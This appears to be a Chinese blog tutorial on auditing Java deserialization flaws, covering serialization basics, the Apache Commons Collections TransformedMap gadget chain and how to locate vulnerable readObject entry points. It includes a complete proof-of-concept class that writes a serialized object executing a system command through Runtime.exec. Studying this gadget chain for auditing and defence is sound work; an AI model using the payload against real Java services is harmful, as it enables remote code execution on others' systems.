java代码审计--反序列化

最新推荐文章于 2023-04-22 09:29:16 发布
最新推荐文章于 2023-04-22 09:29:16 发布
阅读量924 收藏 1
点赞数
分类专栏: java代码审计 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/120305985
版权

基础知识点

1.序列化和反序列化原理

Java.io.ObjectOutputStream  //序列化实现方法-->从这个目标流写的和输出的都是序列化
java.io.ObjectInputStream   //反序列化实现方法-->从这个输出流写的和输出的都是反序列化
//相关步骤
对象序列化步骤
1) 创建一个对象输出流,它可以包装一个其他类型的目标输出流,如文件输出流;
2) 通过对象输出流的writeObject()方法写对象。

反序列化
1) 创建一个对象输入流,它可以包装一个其他类型的源输入流,如文件输入流;
2) 通过对象输入流的readObject()方法读取对象。

//核心导致的原因:反序列化处理中会调用被恢复对象的readObject方法,因此就想办法把这个变成可控的

//一个完整的
import java.io.*;
/*
import java.io.ObjectOutputStream;
import java.io.ObjectInputStream;
import java.io.FileOutputStream;
import java.io.FileInputStream;
*/

public class Java_Test{

    public static void main(String args[]) throws Exception {
        String obj = "ls ";

        // 将序列化对象写入文件object.txt中
        FileOutputStream fos = new FileOutputStream("aa.ser");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        os.writeObject(obj);
        os.close();

        // 从文件object.txt中读取数据
        FileInputStream fis = new FileInputStream("aa.ser");
        ObjectInputStream ois = new ObjectInputStream(fis);

        // 通过反序列化恢复对象obj
        String obj2 = (String)ois.readObject();
        System.out.println(obj2);
        ois.close();
    }

}

2.关键类与函数
TransformedMap

特性:类中数据发生变化时,会触发transform()函数对该对象进行自动化转换。
transform()调用-->TransformedMap.decorate()进行转换
第一个参数 代转换的Map对象
第二个参数 Map对象内的key要经过的转化方法(可为单个方法,也可为链,也可为空)
第三个参数 Map对象内的value要经过的转化方法

在这里插入图片描述
Transformer:存放我们要执行的命令

ChainedTransformer:
1.会挨个执行我们定义的Transformer,即实现链式的transformer转换
2.将一个对象转化为常量,并返回。
在这里插入图片描述
AnnotationInvocationHandler:(这个地方就是进行重写的)
对memberValues的每一项调用了setValue()函数。

完整的利用链

根据上面的知识点
一个完整的利用链就出来了

//1.挖掘思路
触发点、中继点、执行点

//2.执行点构造方法
1)首先构造一个Map和一个能够执行代码的ChainedTransformer2)生成一个TransformedMap实例
3)实例化AnnotationInvocationHandler,并对其进行序列化(这里作用是进行重写,进而在调用这个接口进行处理)
4)当触发readObject()反序列化的时候,就能实现命令执行。

例子demo

import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;
import java.util.Map.Entry;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;



public class POC_Test{
    public static void main(String[] args) throws Exception {
        //execArgs: 待执行的命令数组
        //String[] execArgs = new String[] { "sh", "-c", "whoami > /tmp/fuck" };

        //transformers: 一个transformer链,包含各类transformer对象(预设转化逻辑)的转化数组
        Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            /*
            由于Method类的invoke(Object obj,Object args[])方法的定义
            所以在反射内写new Class[] {Object.class, Object[].class }
            正常POC流程举例:
            ((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("gedit");
            */
            new InvokerTransformer(
                "getMethod",
                new Class[] {String.class, Class[].class },
                new Object[] {"getRuntime", new Class[0] }
            ),
            new InvokerTransformer(
                "invoke",
                new Class[] {Object.class,Object[].class }, 
                new Object[] {null, null }
            ),
            new InvokerTransformer(
                "exec",
                new Class[] {String[].class },
                new Object[] { "whoami" }
                //new Object[] { execArgs } 
            )
        };

        //transformedChain: ChainedTransformer类对象,传入transformers数组,可以按照transformers数组的逻辑执行转化操作
        Transformer transformedChain = new ChainedTransformer(transformers);

        //BeforeTransformerMap: Map数据结构,转换前的Map,Map数据结构内的对象是键值对形式,类比于python的dict
        //Map<String, String> BeforeTransformerMap = new HashMap<String, String>();
        Map<String,String> BeforeTransformerMap = new HashMap<String,String>();

        BeforeTransformerMap.put("hello", "hello");

        //Map数据结构,转换后的Map
       /*
       TransformedMap.decorate方法,预期是对Map类的数据结构进行转化,该方法有三个参数。
            第一个参数为待转化的Map对象
            第二个参数为Map对象内的key要经过的转化方法(可为单个方法,也可为链,也可为空)
            第三个参数为Map对象内的value要经过的转化方法。
       */
        //TransformedMap.decorate(目标Map, key的转化对象(单个或者链或者null), value的转化对象(单个或者链或者null));
        Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap, null, transformedChain);

        Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");

        Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
        ctor.setAccessible(true);
        Object instance = ctor.newInstance(Target.class, AfterTransformerMap);

        File f = new File("temp.bin");
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
        out.writeObject(instance);
    }
}
/*
思路:构建BeforeTransformerMap的键值对,为其赋值,
     利用TransformedMap的decorate方法,对Map数据结构的key/value进行transforme
     对BeforeTransformerMap的value进行转换,当BeforeTransformerMap的value执行完一个完整转换链,就完成了命令执行

     执行本质: ((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec(.........)
     利用反射调用Runtime() 执行了一段系统命令, Runtime.getRuntime().exec()
*/

挖掘常见点

1.漏洞常见触发场景
  1)HTTP请求中的参数,cookies以及Parameters。
  2)RMI协议,被广泛使用的RMI协议完全基于序列化。
  4)JMX 同样用于处理序列化对象。
  5)自定义协议 用来接收与发送原始的java对象。

2. 漏洞挖掘
  (1)确定反序列化输入点
    首先应找出readObject方法调用,在找到之后进行下一步的注入操作。一般可以通过以下方法进行查找:
      1)源码审计:寻找可以利用的“靶点”,即确定调用反序列化函数readObject的调用地点。
       2)对该应用进行网络行为抓包,寻找序列化数据,如wireshark,tcpdump等
     注: java序列化的数据一般会以标记(ac ed 00 05)开头,base64编码后的特征为rO0AB。
  (2)再考察应用的Class Path中是否包含Apache Commons Collections库
  (3)生成反序列化的payload
  (4)提交我们的payload数据

java反序列化基础
补充知识点

①反序列化相关的库
json的
1.fastjson,flexson,genson,json-io(json的)
2.jackson与XStream(xml,json)

②相关的反序列化函数
Object.readObject()
Object.readResolve()
Object.finalize()
goddemon
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
java中的关键字transient,序列相关
weixin_43934923的博客
09-10 247
一、初识transient关键字 其实这个关键字的作用很好理解,就是简单的一句话:将不需要序列的属性前添加关键字transient,序列对象的时候,这个属性就不会被序列。 概念也很好理解,下面使用代码去验证一下: 然后我们在Test中去验证一下: 从上面可以看出,在序列SerializeUser方法中,首先创建一个序列user类,然后将其写入到G://Test/template路径中。在序列DeSerializeUser方法中,首先创建一个File,然后读取G://Test/templat
学习笔记-java代码审计-序列
人饭子的博客
11-13 840
Java代码审计-序列 0x00 漏洞挖掘 业务代码 简单来说,找readObject/readUnshared就好了 protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String baseStr...
序列序列和transient关键字
weixin_43918355的博客
07-03 591
转载地址:序列序列和transient关键字的作用 - duanxz - 博客园 (cnblogs.com) 目录 序列 ID 问题 静态变量序列 父类的序列与 Transient 关键字 对敏感字段加密 序列存储规则 默认序列 手动指定序列过程 重点!!! 我们自己写的writeObject和readObject为什么会被调用? 复杂序列情况总结 序列 ID 问题 情境:两个客户端 A 和 B 试图通过网络传递对象数据,A 端将对象 C 序列...
浅谈Java序列漏洞原理(案例未完善后续补充)
09-18 1344
序列序列 序列用途:方便于对象在网络中的传输和存储 java序列 序列就是将对象转换为流,利于储存和传输的格式 序列序列,将流转换为对象 例如:json序列、XML序列、二进制序列、SOAP序列 序列java.io.ObjectOutputStream 类中的 writeObject() 该方法把对象序列,将字节序列写到一个目标输出流...
Java序列序列(详解)
热门推荐
qq_62414755的博客
07-20 3万+
java序列及可序列讲解,代码清晰易懂。
java序列工具
11-21
Java序列是一种将已序列的对象状态转换回对象的过程,它是Java平台中持久数据的一种常见方式。在Java应用程序中,序列用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
Java安全漫谈-知识星球代码审计
10-14
本资料集围绕Java安全,特别是针对代码审计,深入探讨了多个主题,包括射、RMI(Remote Method Invocation)以及序列等常见安全问题。 1. 射篇: 射是Java提供的一种强大机制,允许程序在运行时动态地...
Java序列工具.zip
05-31
Java序列是一种将之前序列的对象状态转换回对象的过程,它是Java平台中持久数据的一种常见方法。在Java应用程序中,序列用于保存对象的状态以便稍后恢复,或者在网络传输中将对象从一个系统传输到另一个...
完整的Java代码审计学习笔记资源(免费下载)
最新发布
10-31
java代码审计-序列.md 添加一些关于 jndi 的内容 3年前 java代码审计-命令执行.md 第一的 4年前 java代码审计-文件操作.md 第一的 4年前 java代码审计-环境搭建+前置知识.md 第一的 4年前 java代码审计-表达式...
130-剖析xmlDecoder序列.pdf
09-20
在本文中,作者深入分析了Java的xmlDecoder序列机制,以帮助读者理解这个过程,并提供了一些代码审计的技巧。 首先,作者强调了选择xmlDecoder作为研究对象的原因,因为它曾经导致Weblogic服务器遭受攻击。在...
[Java代码审计]javacon WriteUp
Y4tacker的博客
07-21 901
文章目录写在前面javacon 写在前面 在P神星球看到的,这里学习一下,文件在https://www.leavesongs.com/media/attachment/2018/11/23/challenge-0.0.1-SNAPSHOT.jar javacon 运行的时候利用java -jar challenge-0.0.1-SNAPSHOT.jar 首先查看配置 首先在登录页面,在login页面post接收参数,与配置当中的比对,成功则设置cookie @PostMapping({"/login"})
java代码审计序列代码执行)
糖小喵
05-06 511
前言 序列是让 Java 对象脱离 Java 运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久存储。只有实现了 Serializable 和 Externalizable 接口的类的对象才能被序列Java 程序使用 ObjectInputStream 对象的 readObject 方法将序列数据转换为 java 对象。但当输入的序列的数据可被用户控制,那么攻击者即可...
【算法】————3、插入排序
Fly_鹏程万里
04-08 211
算法简介 插入排序(Insertion-Sort)的算法描述是一种简单直观的排序算法。它的工作原理是通过构建有序序列,对于未排序数据,在已排序序列中从后向 前扫描,找到相应位置并插入。插入排序在实现上,通常采用in-place排序(即只需用到O(1)的额外空间的排序),因而在从后向前扫描过程中,需要 复把已排序元素逐步向后挪位,为最新元素提供插入空间。 算法描述和实现 一般来说,插入排序都...
Java代码审计学习笔记
克格莫
10-11 383
此处仅作代码分析,不涉及环境配置及工具使用。 0x00 序列带来的安全问题 0x01 射基础知识 射是Java核心特征之一,射允许运行中的Java程序获取自身的信息,并且可以操作类或对象的内部属性。 通过射在运行时获得程序或程序集中每一个类型的成员和成员的信息, 射机制可以动态地创建对象并调用其属性,这样的对象的类型在编译期是未知的。所以我们可以通过射机制直接创建对象,即使这个对象的类型在编译期是未知的。 射的核心是 JVM 在运行时才动态加载类或调用方法/访问属性,它不需要事先(写代码
Java代码审计-设计模式-策略模式
Margin的博客
04-22 140
- 什么是策略模式 - JavaSE策略模式的应用 - Struts2策略模式的应用
Bugku的web练习题(二)
weixin_43342135的博客
07-21 316
九.本地包含 参考博客:https://blog.csdn.net/xuchen16/article/details/82734758 1.打开题目的网页发现,网页的源代码审计代码,发现输入的东西都给hello变量,然后构造代码,将flag导出: 十.变量1 参考博客:https://blog.csdn.net/xuchen16/article/details/82737194 1.首先对...
代码审计之WEBGOAT 序列
weixin_43263451的博客
06-11 966
序列这关在前端页面可以看到是提交token到后端,先看一下接口名可以看到接口名为InsecureDeserialization/task,那就后端全局搜索InsecureDeserialization/task,最终定位到InsecureDeserializationTask.java源码如下: ​ 可以看到大概就是对输入的token先base64解码然后输入到字节数组输入流中然后再接到对象输入流,并利用readObject进行序列操作得到对象o,然后判断该对象是否属于VulnerableTask
yii2.0.37序列漏洞审计
soufaker的安全屋
12-16 606
网上很多师傅都有审计yii2.0.37序列漏洞,自己也弄来学习学习
Fastjson序列审计及验证
liguangyao213的博客
04-02 1575
java代码审计系统课程--代码审计视频教程-信息安全-CSDN程序员研修院少写“漏洞” 了解常见代码安全 提升代码安全能力 代码不被黑客黑-https://edu.csdn.net/course/detail/32634 Fastjson序列 代码审计 本项目引入的Fastjson版本为1.2.58,该版本存在序列漏洞。 已确定了Fastjson版本存在问题,进一步寻找触发Fastjson的漏洞点。 我们关注两个函数JSON.parse()和JSON.parseObject(),并且执.
怎么判断序列漏洞攻击成功
05-11
序列漏洞攻击成功的判断方式会因具体情况而异,但通常会涉及以下一些方面: 1. 异常情况:攻击者可能会构造一个恶意的序列对象,以触发应用程序中的异常。如果应用程序中出现了异常或奔溃,可以考虑是否存在序列漏洞攻击。 2. 不正常的行为:攻击者利用序列漏洞可能会执行一些恶意行为,例如读取、修改或删除文件,执行远程代码等。如果发现应用程序出现了不正常的行为,可以考虑是否存在序列漏洞攻击。 3. 日志审计:应用程序通常会记录一些日志信息,包括序列操作。通过审计这些日志可以发现是否存在异常的序列操作。 4. 检测工具:可以使用一些专门的漏洞扫描工具,例如 ysoserial、Java-Deserialization-Scanner 等,来检测是否存在序列漏洞。 需要注意的是,一旦发现序列漏洞攻击,应该及时修复漏洞,并加强应用程序的安全性防护措施,以避免类似漏洞再次出现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值